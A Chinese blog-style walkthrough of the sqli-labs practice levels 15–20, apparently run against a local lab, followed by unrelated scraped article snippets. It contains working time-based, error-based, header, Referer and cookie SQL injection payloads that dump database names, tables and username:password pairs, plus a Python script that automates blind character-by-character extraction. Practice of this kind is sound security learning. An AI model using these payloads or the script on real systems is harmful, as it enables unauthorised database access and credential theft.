admin’ and if(length(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security”), 1)) =20, sleep(1), 1)#

延迟1秒多，说明长度是20
在轮子的基础上用户名输入
admin’ and if(substr(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’), 1),1,1) = ‘s’, sleep(1), 1)#
然后用burp批量爆破

和正确答案一模一样

f.获取表内数据
在轮子的基础上用户名输入
admin’ and if(length(substr((select group_concat(username, ‘:’, password) from users), 1)) =188, sleep(1), 1)#

延迟1秒多，说明长度是188，当然这个188也可以用爆破获得，以下实操下

可以发现1677的188找到了，确实延迟了1秒多
在轮子的基础上用户名输入
admin’ and if(substr(substr((select group_concat(username, ‘:’, password) from users), 1),1,1) = ‘s’, sleep(1), 1)#
Burp爆破结果

正确结果如下，可见完全正确

17.Less-16

a.注入点判断

还是时间盲注，但是怎么试不出变化来呢
测试后发现居然会判断用户名是不是存在admin，不存在失败的，这也给了我一个提醒，以后就用admin测试好了
admin") and sleep(1) #

b.轮子测试

用户名输入
admin") and if(1=1, sleep(1), 1)#，密码1

延迟1秒，轮子可用

c.获取数据库名称

在轮子的基础上用户名输入
admin") and if(length(database())=8, sleep(1), 1)#

说明长度是8
用户名输入
admin") and if(substr(substr((database()), 1),1,1) = ‘s’, sleep(1), 1)#
Bp爆破结果

d.获取表信息

在轮子的基础上用户名输入
admin") and if(length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1)) =29, sleep(1), 1)#

说明长度是29
用户名输入
admin") and if(substr(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’), 1),1,1) = ‘s’, sleep(1), 1)#
Bp爆破结果

e.获取列信息

在轮子的基础上用户名输入
admin") and if(length(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security”), 1)) =20, sleep(1), 1)#

说明长度是20
用户名输入
admin") and if(substr(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘security’), 1),1,1) = ‘s’, sleep(1), 1)#
Bp爆破结果

f.获取表内数据

在轮子的基础上用户名输入
admin") and if(length(substr((select group_concat(username, ‘:’, password) from users), 1)) =188, sleep(1), 1)#

说明长度是188
用户名输入
admin") and if(substr(substr((select group_concat(username, ‘:’, password) from users), 1),1,1) = ‘s’, sleep(1), 1)#
Bp爆破结果

18.Less-17

a.注入点判断

17关看来又有新东西要学了
直接输入admin admin竟然变成改密成功

看来这关是用于改密码的

加单引号，又有报错提示了，但前提条件是需要知道有admin这个用户，先不管那个，后面再研究，先利用报错注入一下

b.获取数据库名称

uname=admin&passwd=2’ and updatexml(1,concat(0x7e,(SELECT database())),0x7e)–+

发现单纯把上面的poc输到框里是没用的，必须在bp抓包重放里做才行，好吧，也算多学到一招

c.获取表信息

uname=admin&passwd=2’ and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’ limit 0,1),0x7e), 0x7e)

d.获取列信息

uname=admin&passwd=2’ and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security” limit 0,1),0x7e), 0x7e) --+

e.获取表内数据

uname=admin&passwd=2’ and updatexml(1, concat(0x7e,(select concat(username, ‘:’, password) from users limit 0,1), 0x7e),1)
–+
select (extractvalue(1,concat(0x7e,(select concat(username, ‘:’, password) from users limit 0,1), 0x7e)));

但是纳闷的是同样的语句前两个都可以爆出来，这里怎么不行呢

查了很多资料后发现居然需要用双层select才行
uname=admin&passwd=2’ and updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), “:”, (select password from (select username,password from users limit 3, 1) test2)), 1) --+&submit=Submit

其中3是密码id

19.Less-18

a.注入点判断

试了下界面上输出没任何变化

提示说是header注入，难道又需要用到bp
开启拦截看下，UA后面加单引号试下，同时用户名用admin(如果不存在这个用户就不会报错)，加2个单引号又正常，加三个再次报错，说明ua这里存在注入

b.轮子测试

现在开始尝试设计轮子
’ 1=1 #

发现原sql里像是有(v1, v2, v3)的结构，那么是不是要先闭合括号呢
Ua后面加’, 1, 1)#
发现没有报错了，猜想是不是轮子可用

c.获取数据库名称

然后对括号里的1替换成updatexml
', updatexml(1,concat(0x7e,(SELECT database())),0x7e), 1)#

d.获取表信息

', updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’ limit 0,1),0x7e), 0x7e), 1)#

e.获取列信息

', updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security” limit 0,1),0x7e), 0x7e), 1)#

f.获取表内数据

', updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), “:”, (select password from (select username,password from users limit 3, 1) test2)), 1), 1)#

20.轮子模式总结

到目前为止，我总结了一下出现过的轮子，可以得出一个结论，首先需要知道有几个参数，前面6种都是单参数的，多参数的只能通过报错信息得知，用–+还是#也要看报错情况
①　n’ union select 1,2, ’
n可以是1，-1,n’后面可接),select后面看情况设置显示位
②　')–+
)可选，'可换成"
③　‘) --+(
)可换成))，(可换成((，‘可换成"
④　" --+或’ #或’ --+
⑤　’ and if(1=1, sleep(1), 1)#
⑥　") and sleep(1) #
⑦　', 1, 1)#

21.Less-19

a.注入点判断

还是一样，需要事先知道一个用户名密码，不然没法报错
这次的注入点是Referer:

b.轮子测试

用上一关的轮子试下，', 1, 1)#，报列数不匹配

减一列或加一列试下，发现减一列可以

那么轮子就是’, 1)#

c.获取数据库名称

然后对括号里的1替换成updatexml
', updatexml(1,concat(0x7e,(SELECT database())),0x7e))#

d.获取表信息

', updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’ limit 0,1),0x7e), 0x7e))#

e.获取列信息

', updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security” limit 0,1),0x7e), 0x7e))#

f.获取表内数据

这两关应该都是用在已经注册了用户知道其中一个用户名密码的情况下的测试，不然根本测不了

22.Less-20

登录后界面变成这样了

Cookie注入，怎么注入呢，抓包看下吧
登录后发现有两个包，其中一个存在cookie

重放看下能不能注入

a.注入点判断

加单引号报错，存在注入点

b.轮子测试

看报错应该是只有一个参数
轮子就是 ’ and #或’ and --+

c.获取数据库名称

’ and updatexml(1,concat(0x7e,(SELECT database())),0x7e)–+

这里要注意两边的括号数是不是相等

d.获取表信息

’ and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘security’ limit 0,1),0x7e), 0x7e)–+

e.获取列信息

’ and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security” limit 0,1),0x7e), 0x7e)–+

f.获取表内数据

’ and updatexml(1, concat(0x7e, (select username from (select username,password from users limit 3, 1) test), “:”, (select password from (select username,password from users limit 3, 1) test2)), 1)–+

三、python读取网页返回工具

接下来这个单元我们要开发个工具，专门用于sql注入
输入是个文本，里面是我们写好sql注入的url，我们这里已经是基于批量读取的模块开发

可以看到两个网页都只是返回200，那么我们怎么获取网页内容呢
发现在返回200的时候执行以下语句可以获取网页内容

其实这里我有个想法，就是输出用户指定关键字的内容，而不是整个网页都输出来，那样很乱,比如这里的You are in就是个关键字，找到后输出那一行就行，找不到就说找不到，然后每次把找到的结果和url 一起输出到文本中
比如像下面这样

可以看到我们获取到了到指定位置所在行数据
接下来我们还可以做个url输入函数，这样不用手动去改输入文本
比如我们需要遍历写入
127.0.0.1:9009/Less-5/?id=14’ and substr(substr((select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“security”), 1), 2, 1)=‘d’–+
像这样遍历写入生成文本

遍历执行后，我们发现在第20行出现了变化

接下来只需要把每次的结果写到文本里就行，像这样，只是把有输出结果的写到文本里就行

经过验证，确实只有2和20在界面上有响应
也就是说第二个字母和第20个字母都是d,而事实也确实如此

如此，单个字母的遍历就完成了，接下来再加一重循环就可以完整遍历整个字符串了
像这样遍历每个字母生成url

是不是刚好有id username pa只是还少特殊符号和数字，这里只是把26个字母的遍历加进去了，加上这些之后

刚好全部找到了

以下是这个工具的完整代码

import requests
import os
import sys

def writeurl(file, url, ends1, ends2, num):
    s = ['`', '!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '-', ',', '.', ':']
    for i in range(1, num):
        for k  in range(26):    
            content = url
            content += str(i)
            content += ends1
            content += "'"    
            content += chr(ord('a') + k)
            content += "'"
            content += ends2
            file.write(content)
        for k  in range(10):    
            content = url
            content += str(i)
            content += ends1
            content += "'"    
            content += chr(ord('0') + k)
            content += "'"
            content += ends2
            file.write(content)
        for k  in s:    
            content = url
            content += str(i)
            content += ends1
            content += "'"    
            content += k
            content += "'"
            content += ends2
            file.write(content)

def myfind(content, key): 
    if content.find(key) != -1:
        j = 0
        s = []
        start = 0  
        end = 0  
        for i in content:
            j += 1
            if i == '\n' and j < content.find(key):
                start = j
            if j > content.find(key):
                if i == '\n':
                    end = j
                    break
        str1 = ""
        j = 0
        for i in content:
            j+=1
            if j > start and j < end:
                s.append(i)
        str1  = str1.join(s)
        print(str1)
        return str1
    
def getlength(text, value):
    if len(text) == value:
        return True
    else:
        return False



if __name__ == "__main__":
    url = "127.0.0.1:9009/Less-9/?id=14' and substr(substr((select group_concat(username, ':', password) from users), 1), "
    j = 'a'
    fp = open("url1.txt", "w")
        #21是目标长度
    writeurl(fp, url, ", 1)=", "--+\n", 188+1)
    fp.close()
    searchtype = 1  #0是内容查询 1是长度查询

    file_name = input()             #读取文件名
    b = os.path.exists(file_name)   #先判断文件是否存在
    if b == False:
        print("文件不存在")
    else:
        fp1 = open(file_name, "r")      #以只读，打开文件
        fp2 = open("result.txt", "w")
        fp3 = open("output.txt", "w")
        for line in fp1.readlines():    #readlines 按行读取文件，会保留'\n'，返回一个(文件中一行为一个元素)列表
            url = "http://" + line         #利用line遍历列表，加上https://，使它成为完整的url
            url = url.replace("\n","")      #把文件中读出来时，末尾的‘\n’去掉(替换成空)
            #print(url)
            try:                        #异常处理
                code = requests.get(url,allow_redirects=False, timeout=5).status_code   #获取状态码，通过状态码判断url网址状态
                #print(code)                                         
                if (code == 200 or code == 412):                   #将状态码为200的保存到result.txt文件中    
                    fp2.write(url + "\n")           #写入时要加入'\n'，不会自动添加
                    response = requests.get(url)  
                    if searchtype == 0:
                        content = myfind(response.text, "You are in")
                        if content != None:
                            print(content)
                            c = url
                            c += ":"
                            c += content
                            c += "\n"
                            fp3.write(c)
                    elif searchtype == 1:
                        right = getlength(response.text, 707)
                        if right == True:
                            print(right)
                            c = url
                            c += ":"
                            c += "\n"
                            fp3.write(c)


            except requests.exceptions.ConnectionError:     #requests.exceptions.ConnectionError是一种异常类型
                                  #利用except捕获错误，做出回显(屏幕上有反应)，有异常处理，就不会中断脚本运行
                print("Connection Error")
            except Exception as e:  #其他错误
                print("未知错误")
        fp1.close()
        fp2.close()
        fp3.close()
    ss = []
    with open('output.txt', 'r') as f:
        for line in f.readlines():
            pos = line.find("'--+:") - 1
            if pos > 0:
                ss.append(line[pos])
        f.close()
    with open('output.txt', 'a+') as f:
        str1 = ""
        str1  = str1.join(ss)
        f.write(str1)
        f.close()
    print(str1)

你可能感兴趣的:(sql,oracle,数据库)

mysql禁用远程登录 igotyback mysql
去mysql库中的user表里，将host都改成localhost之后刷新权限FLUSHPRIVILEGES;
Google earth studio 简介陟彼高冈yu 旅游
GoogleEarthStudio是一个基于Web的动画工具，专为创作使用GoogleEarth数据的动画和视频而设计。它利用了GoogleEarth强大的三维地图和卫星影像数据库，使用户能够轻松地创建逼真的地球动画、航拍视频和动态地图可视化。网址为https://www.google.com/earth/studio/。GoogleEarthStudio是一个基于Web的动画工具，专为创作使用G
关于提高复杂业务逻辑代码可读性的思考编程经验分享开发经验 java 数据库开发语言
目录前言需求场景常规写法拆分方法领域对象总结前言实际工作中大部分时间都是在写业务逻辑，一般都是三层架构，表示层（Controller）接收客户端请求，并对入参做检验，业务逻辑层（Service）负责处理业务逻辑，一般开发都是在这一层中写具体的业务逻辑。数据访问层（Dao）是直接和数据库交互的，用于查数据给业务逻辑层，或者是将业务逻辑层处理后的数据写入数据库。简单的增删改查接口不用多说，基本上写好一
SQL Server_查询某一数据库中的所有表的内容 qq_42772833 SQL Server 数据库 sqlserver
1.查看所有表的表名要列出CrabFarmDB数据库中的所有表（名），可以使用以下SQL语句：USECrabFarmDB;--切换到目标数据库GOSELECTTABLE_NAMEFROMINFORMATION_SCHEMA.TABLESWHERETABLE_TYPE='BASETABLE';对这段SQL脚本的解释：SELECTTABLE_NAME：这个语句的作用是从查询结果中选择TABLE_NAM
深入理解 MultiQueryRetriever：提升向量数据库检索效果的强大工具 nseejrukjhad 数据库 python
深入理解MultiQueryRetriever：提升向量数据库检索效果的强大工具引言在人工智能和自然语言处理领域，高效准确的信息检索一直是一个关键挑战。传统的基于距离的向量数据库检索方法虽然广泛应用，但仍存在一些局限性。本文将介绍一种创新的解决方案：MultiQueryRetriever，它通过自动生成多个查询视角来增强检索效果，提高结果的相关性和多样性。MultiQueryRetriever的工
MYSQL面试系列-04 king01299 面试 mysql 面试
MYSQL面试系列-0417.关于redolog和binlog的刷盘机制、redolog、undolog作用、GTID是做什么的？innodb_flush_log_at_trx_commit及sync_binlog参数意义双117.1innodb_flush_log_at_trx_commit该变量定义了InnoDB在每次事务提交时，如何处理未刷入（flush）的重做日志信息（redolog）。它
MongoDB Oplog 窗口喝醉酒的小白 MongoDB 运维
在MongoDB中，oplog（操作日志）是一个特殊的日志系统，用于记录对数据库的所有写操作。oplog允许副本集成员（通常是从节点）应用主节点上已经执行的操作，从而保持数据的一致性。它是MongoDB副本集实现数据复制的基础。MongoDBOplog窗口oplog窗口是指在MongoDB副本集中，从节点可以用来同步数据的时间范围。这个窗口通常由以下因素决定：Oplog大小：oplog的大小是有限
python os 环境变量 CV矿工 python 开发语言 numpy
环境变量：环境变量是程序和操作系统之间的通信方式。有些字符不宜明文写进代码里，比如数据库密码，个人账户密码，如果写进自己本机的环境变量里，程序用的时候通过os.environ.get（）取出来就行了。os.environ是一个环境变量的字典。环境变量的相关操作importos"""设置/修改环境变量：os.environ[‘环境变量名称’]=‘环境变量值’#其中key和value均为string类
【PG】常见数据库、表属性设置江无羡数据库
PG的常见属性配置方法数据库复制、备份相关表的复制标识单表操作批量表操作链接数据库复制、备份相关表的复制标识单表操作通过ALTER语句单独更改一张表的复制标识。ALTERTABLE[tablename]REPLICAIDENTITYFULL;批量表操作通过代码块的方式，对某个schema中的所有表一起更新其复制标识。SELECTtablename,CASErelreplidentWHEN'd'TH
nosql数据库技术与应用知识点皆过客，揽星河 NoSQL nosql 数据库大数据数据分析数据结构非关系型数据库
Nosql知识回顾大数据处理流程数据采集(flume、爬虫、传感器)数据存储(本门课程NoSQL所处的阶段)Hdfs、MongoDB、HBase等数据清洗(入仓)Hive等数据处理、分析(Spark、Flink等)数据可视化数据挖掘、机器学习应用(Python、SparkMLlib等)大数据时代存储的挑战(三高)高并发(同一时间很多人访问)高扩展(要求随时根据需求扩展存储)高效率(要求读写速度快)
SpringBlade dict-biz/list 接口 SQL 注入漏洞文章永久免费只为良心 oracle 数据库
SpringBladedict-biz/list接口SQL注入漏洞POC:构造请求包查看返回包你的网址/api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1漏洞概述在SpringBlade框架中，如果dict-biz/list接口的后台处理逻辑没有正确地对用户输入进行过滤或参数化查询（PreparedSta
insert into select 主键自增_mybatis拦截器实现主键自动生成 weixin_39521651 insert into select 主键自增 mybatis delete返回值 mybatis insert返回主键 mybatis insert返回对象 mybatis plus insert返回主键 mybatis plus 插入生成id
前言前阵子和朋友聊天，他说他们项目有个需求，要实现主键自动生成，不想每次新增的时候，都手动设置主键。于是我就问他，那你们数据库表设置主键自动递增不就得了。他的回答是他们项目目前的id都是采用雪花算法来生成，因此为了项目稳定性，不会切换id的生成方式。朋友问我有没有什么实现思路，他们公司的orm框架是mybatis，我就建议他说，不然让你老大把mybatis切换成mybatis-plus。mybat
关于Mysql 中 Row size too large (＞ 8126) 错误的解决和理解秋刀prince mysql mysql 数据库
提示：啰嗦一嘴，数据库的任何操作和验证前，一定要记得先备份！！！不会有错；文章目录问题发现一、问题导致的可能原因1、页大小2、行格式2.1compact格式2.2Redundant格式2.3Dynamic格式2.4Compressed格式3、BLOB和TEXT列二、解决办法1、修改页大小（不推荐）2、修改行格式3、修改数据类型为BLOB和TEXT列4、其他优化方式（可以参考使用）4.1合理设置数据
Java爬虫框架（一）--架构设计狼图腾-狼之传说 java 框架 java 任务 html解析器存储电子商务
一、架构图那里搜网络爬虫框架主要针对电子商务网站进行数据爬取，分析，存储，索引。爬虫：爬虫负责爬取，解析，处理电子商务网站的网页的内容数据库：存储商品信息索引：商品的全文搜索索引Task队列：需要爬取的网页列表Visited表：已经爬取过的网页列表爬虫监控平台：web平台可以启动，停止爬虫，管理爬虫，task队列，visited表。二、爬虫1.流程1)Scheduler启动爬虫器，TaskMast
MongoDB知识概括 GeorgeLin98 持久层 mongodb
MongoDB知识概括MongoDB相关概念单机部署基本常用命令索引-IndexSpirngDataMongoDB集成副本集分片集群安全认证MongoDB相关概念业务应用场景：传统的关系型数据库（如MySQL），在数据操作的“三高”需求以及应对Web2.0的网站需求面前，显得力不从心。解释：“三高”需求：①Highperformance-对数据库高并发读写的需求。②HugeStorage-对海量数
Mongodb Error: queryTxt ETIMEOUT xxxx.wwwdz.mongodb.net 佛一脚 error react mongodb 数据库
背景每天都能遇到奇怪的问题，做个记录，以便有缘人能得到帮助！换了一台电脑开发nextjs程序。需要连接mongodb数据，对数据进行增删改查。上一台电脑好好的程序，新电脑死活连不上mongodb数据库。同一套代码，没任何修改，搞得我怀疑人生了，打开浏览器进入mongodb官网毫无问题，也能进入线上系统查看数据，网络应该是没问题。于是我尝试了一下手机热点，这次代码能正常跑起来，连接数据库了！！！是不
JAVA·一个简单的登录窗口 MortalTom java 开发语言学习
文章目录概要整体架构流程技术名词解释技术细节资源概要JavaSwing是Java基础类库的一部分，主要用于开发图形用户界面（GUI）程序整体架构流程新建项目，导入sql.jar包（链接放在了文末），编译项目并运行技术名词解释一、特点丰富的组件提供了多种可视化组件，如按钮（JButton）、文本框（JTextField）、标签（JLabel）、下拉列表（JComboBox）等，可以满足不同的界面设计
入门MySQL——查询语法练习 K_un
前言：前面几篇文章为大家介绍了DML以及DDL语句的使用方法，本篇文章将主要讲述常用的查询语法。其实MySQL官网给出了多个示例数据库供大家实用查询，下面我们以最常用的员工示例数据库为准，详细介绍各自常用的查询语法。1.员工示例数据库导入官方文档员工示例数据库介绍及下载链接：https://dev.mysql.com/doc/employee/en/employees-installation.h
博客网站制作教程 2401_85194651 java maven
首先就是技术框架：后端：Java+SpringBoot数据库：MySQL前端：Vue.js数据库连接：JPA(JavaPersistenceAPI)1.项目结构blog-app/├──backend/│├──src/main/java/com/example/blogapp/││├──BlogApplication.java││├──config/│││└──DatabaseConfig.java
ubuntu安装wordpress lissettecarlr
1安装nginx网上安装方式很多，这就就直接用apt-get了apt-getinstallnginx不用启动啥，然后直接在浏览器里面输入IP:80就能看到nginx的主页了。如果修改了一些配置可以使用下列命令重启一下systemctlrestartnginx.service2安装mysql输入安装前也可以更新一下软件源，在安装过程中将会让你输入数据库的密码。sudoapt-getinstallmy
深入浅出 -- 系统架构之负载均衡Nginx的性能优化 xiaoli8748_软件开发系统架构系统架构负载均衡 nginx
一、Nginx性能优化到这里文章的篇幅较长了，最后再来聊一下关于Nginx的性能优化，主要就简单说说收益最高的几个优化项，在这块就不再展开叙述了，毕竟影响性能都有多方面原因导致的，比如网络、服务器硬件、操作系统、后端服务、程序自身、数据库服务等，对于性能调优比较感兴趣的可以参考之前《JVM性能调优》中的调优思想。优化一：打开长连接配置通常Nginx作为代理服务，负责分发客户端的请求，那么建议开启H
【RabbitMQ 项目】服务端：数据管理模块之绑定管理月夜星辉雪 rabbitmq 分布式
文章目录一.编写思路二.代码实践一.编写思路定义绑定信息类交换机名称队列名称绑定关键字：交换机的路由交换算法中会用到没有是否持久化的标志，因为绑定是否持久化取决于交换机和队列是否持久化，只有它们都持久化时绑定才需要持久化。绑定就好像一根绳子，两端连接着交换机和队列，当一方不存在，它就没有存在的必要了定义绑定持久化类构造函数：如果数据库文件不存在则创建，打开数据库，创建binding_table插入
计算机毕业设计PHP仓储综合管理系统（源码+程序+VUE+lw+部署） java毕设程序源码王哥 php 课程设计 vue.js
该项目含有源码、文档、程序、数据库、配套开发软件、软件安装教程。欢迎交流项目运行环境配置：phpStudy+Vscode+Mysql5.7+HBuilderX+Navicat11+Vue+Express。项目技术：原生PHP++Vue等等组成，B/S模式+Vscode管理+前后端分离等等。环境需要1.运行环境：最好是小皮phpstudy最新版，我们在这个版本上开发的。其他版本理论上也可以。2.开发
MyBatis 详解阿贾克斯的黎明 java mybatis
目录目录一、MyBatis是什么二、为什么使用MyBatis（一）灵活性高（二）性能优化（三）易于维护三、怎么用MyBatis（一）添加依赖（二）配置MyBatis（三）创建实体类和接口（四）使用MyBatis一、MyBatis是什么MyBatis是一个优秀的持久层框架，它支持自定义SQL、存储过程以及高级映射。MyBatis免除了几乎所有的JDBC代码以及设置参数和获取结果集的工作。它可以通过简
3.增删改查--连接查询问女何所忆
关系型数据库的一个特点就是，多张表之间存在关系，以致于我们可以连接多张表进行查询操作，所以连接查询会是关系型数据库中最常见的操作。连接查询主要分为三种，交叉连接、内连接和外连接，我们一个个说。1、交叉连接交叉连接其实连接查询的第一个阶段，它简单表现为两张表的笛卡尔积形式，具体例子：如果你没学过数学中的笛卡尔积概念，你可以这样简单的理解这里的交叉连接：两张表的交叉连接就是一个连接合并的过程，T1表中
You have an error in your SQL syntax； check the manual that corresponds to your MySQL server version 努力的菜鸟~ sql 数据库
YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear‘IDENTIFIEDBY‘123456’WITHGRANTOPTION’atline1在mysql5.7之前GRANTALLPRIVILEGESON*.*TO'root'@'%'I
docker from指令的含义_多个FROM-含义 weixin_39722188 docker from指令的含义
小编典典什么是基本图片？一组文件，加上EXPOSE端口ENTRYPOINT和CMD。您可以添加文件并基于该基础图像构建新图像，Dockerfile并以FROM指令开头：后面提到的图像FROM是新图像的“基础图像”。这是否意味着如果我neo4j/neo4j在FROM指令中声明，则在运行映像时，neo数据库将自动运行并且可在端口7474的容器中使用？仅当您不覆盖CMD和时ENTRYPOINT。但是图像
Redis:缓存击穿我的程序快快跑啊缓存 redis java
缓存击穿(热点key)：部分key(被高并发访问且缓存重建业务复杂的)失效,无数请求会直接到数据库，造成巨大压力1.互斥锁：可以保证强一致性线程一：未命中之后，获取互斥锁，再查询数据库重建缓存，写入缓存，释放锁线程二：查询未命中，未获得锁(已由线程一获得)，等待一会，缓存命中互斥锁实现方式：redis中setnxkeyvalue:改变对应key的value,仅当value不存在时执行，以此来实现互
mysql学习教程，从入门到精通，TOP 和MySQL LIMIT 子句（15）知识分享小能手大数据数据库 MySQL mysql 学习 oracle 数据库开发语言 adb 大数据
1、TOP和MySQLLIMIT子句内容在SQL中，不同的数据库系统对于限制查询结果的数量有不同的实现方式。TOP关键字主要用于SQLServer和Access数据库中，而LIMIT子句则主要用于MySQL、PostgreSQL（通过LIMIT/OFFSET语法）、SQLite等数据库中。下面将分别详细介绍这两个功能的语法、语句以及案例。1.1、TOP子句（SQLServer和Access）1.1
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your †徐先森® Oracle数据库 Web相关错误集
createtablestudents(idintunsignedprimarykeyauto_increment,namevarchar(50)notnull,ageintunsigned,highdecimal(3,2),genderenum('男','女','中性','保密','妖')default'保密',cls_idintunsigned);在对数据库插入如上带有中文带有默认值的字段的时
矩阵求逆（JAVA）利用伴随矩阵 qiuwanchi 利用伴随矩阵求逆矩阵
package gaodai.matrix; import gaodai.determinant.DeterminantCalculation; import java.util.ArrayList; import java.util.List; import java.util.Scanner; /** * 矩阵求逆(利用伴随矩阵) * @author 邱万迟
单例（Singleton）模式 aoyouzi 单例模式 Singleton
3.1 概述如果要保证系统里一个类最多只能存在一个实例时，我们就需要单例模式。这种情况在我们应用中经常碰到，例如缓存池，数据库连接池，线程池，一些应用服务实例等。在多线程环境中，为了保证实例的唯一性其实并不简单，这章将和读者一起探讨如何实现单例模式。 3.2
[开源与自主研发]就算可以轻易获得外部技术支持,自己也必须研发 comsci 开源
现在国内有大量的信息技术产品，都是通过盗版，免费下载，开源，附送等方式从国外的开发者那里获得的。。。。。。虽然这种情况带来了国内信息产业的短暂繁荣，也促进了电子商务和互联网产业的快速发展，但是实际上，我们应该清醒的看到，这些产业的核心力量是被国外的
页面有两个frame,怎样点击一个的链接改变另一个的内容 Array_06 UI XHTML
<a src="地址" targets="这里写你要操作的Frame的名字" />搜索然后你点击连接以后你的新页面就会显示在你设置的Frame名字的框那里 targerts="",就是你要填写目标的显示页面位置 ===================== 例如： <frame src=&
Struts2实现单个/多个文件上传和下载 oloz 文件上传 struts
struts2单文件上传：步骤01:jsp页面  　　<form action="fileUplo
推荐10个在线logo设计网站 362217990 logo
在线设计Logo网站。 1、http://flickr.nosv.org（这个太简单） 2、http://www.logomaker.com/?source=1.5770.1 3、http://www.simwebsol.com/ImageTool 4、http://www.logogenerator.com/logo.php?nal=1&tpl_catlist[]=2 5、ht
jsp上传文件香水浓 jsp fileupload
1. jsp上传 Notice： 1. form表单 method 属性必须设置为 POST 方法，不能使用 GET 方法 2. form表单 enctype 属性需要设置为 multipart/form-data 3. form表单 action 属性需要设置为提交到后台处理文件上传的jsp文件地址或者servlet地址。例如 uploadFile.jsp 程序文件用来处理上传的文
我的架构经验系列文章 - 前端架构 agevs JavaScript Web 框架 UI jQuer
框架层面：近几年前端发展很快，前端之所以叫前端因为前端是已经可以独立成为一种职业了，js也不再是十年前的玩具了，以前富客户端RIA的应用可能会用flash/flex或是silverlight，现在可以使用js来完成大部分的功能，因此js作为一门前端的支撑语言也不仅仅是进行的简单的编码，越来越多框架性的东西出现了。越来越多的开发模式转变为后端只是吐json的数据源，而前端做所有UI的事情。MVCMV
android ksoap2 中把XML(DataSet) 当做参数传递 aijuans android
我的android app中需要发送webservice ，于是我使用了 ksop2 进行发送，在测试过程中不是很顺利,不能正常工作.我的web service 请求格式如下 [html] view plain copy <Envelope xmlns="http://schemas.
使用Spring进行统一日志管理 + 统一异常管理 baalwolf spring
统一日志和异常管理配置好后，SSH项目中，代码以往散落的log.info() 和 try..catch..finally 再也不见踪影！统一日志异常实现类： [java] view plain copy package com.pilelot.web.util; impor
Android SDK 国内镜像 BigBird2012 android sdk
一、镜像地址： 1、东软信息学院的 Android SDK 镜像，比配置代理下载快多了。配置地址， http://mirrors.neusoft.edu.cn/configurations.we#android 2、北京化工大学的： IPV4:ubuntu.buct.edu.cn IPV4:ubuntu.buct.cn IPV6:ubuntu.buct6.edu.cn
HTML无害化和Sanitize模块 bijian1013 JavaScript AngularJS Linky Sanitize
一.ng-bind-html、ng-bind-html-unsafe AngularJS非常注重安全方面的问题，它会尽一切可能把大多数攻击手段最小化。其中一个攻击手段是向你的web页面里注入不安全的HTML，然后利用它触发跨站攻击或者注入攻击。考虑这样一个例子，假设我们有一个变量存
[Maven学习笔记二]Maven命令 bit1129 maven
mvn compile compile编译命令将src/main/java和src/main/resources中的代码和配置文件编译到target/classes中，不会对src/test/java中的测试类进行编译 MVN编译使用 maven-resources-plugin:2.6:resources maven-compiler-plugin:2.5.1:compile &nbs
【Java命令二】jhat bit1129 Java命令
jhat用于分析使用jmap dump的文件，，可以将堆中的对象以html的形式显示出来，包括对象的数量，大小等等，并支持对象查询语言。 jhat默认开启监听端口7000的HTTP服务，jhat是Java Heap Analysis Tool的缩写 1. 用法： [hadoop@hadoop bin]$ jhat -help Usage: jhat [-stack <bool&g
JBoss 5.1.0 GA:Error installing to Instantiated: name=AttachmentStore state=Desc ronin47
进到类似目录 server/default/conf/bootstrap，打开文件 profile.xml找到： Xml代码<bean name="AttachmentStore" class="org.jboss.system.server.profileservice.repository.AbstractAtta
写给初学者的6条网页设计安全配色指南 brotherlamp UI ui自学 ui视频 ui教程 ui资料
网页设计中最基本的原则之一是，不管你花多长时间创造一个华丽的设计，其最终的角色都是这场秀中真正的明星——内容的衬托我仍然清楚地记得我最早的一次美术课，那时我还是一个小小的、对凡事都充满渴望的孩子，我摆放出一大堆漂亮的彩色颜料。我仍然记得当我第一次看到原色与另一种颜色混合变成第二种颜色时的那种兴奋，并且我想，既然两种颜色能创造出一种全新的美丽色彩，那所有颜色
有一个数组，每次从中间随机取一个，然后放回去，当所有的元素都被取过，返回总共的取的次数。写一个函数实现。复杂度是什么。 bylijinnan java 算法面试
import java.util.Random; import java.util.Set; import java.util.TreeSet; /** * http://weibo.com/1915548291/z7HtOF4sx * #面试题#有一个数组，每次从中间随机取一个，然后放回去，当所有的元素都被取过，返回总共的取的次数。 * 写一个函数实现。复杂度是什么
struts2获得request、session、application方式 chiangfai application
1、与Servlet API解耦的访问方式。 a.Struts2对HttpServletRequest、HttpSession、ServletContext进行了封装，构造了三个Map对象来替代这三种对象要获取这三个Map对象，使用ActionContext类。 -----> package pro.action; import java.util.Map; imp
改变python的默认语言设置 chenchao051 python
import sys sys.getdefaultencoding() 可以测试出默认语言，要改变的话，需要在python lib的site-packages文件夹下新建： sitecustomize.py，这个文件比较特殊，会在python启动时来加载，所以就可以在里面写上： import sys sys.setdefaultencoding('utf-8') &n
mysql导入数据load data infile用法 daizj mysql 导入数据
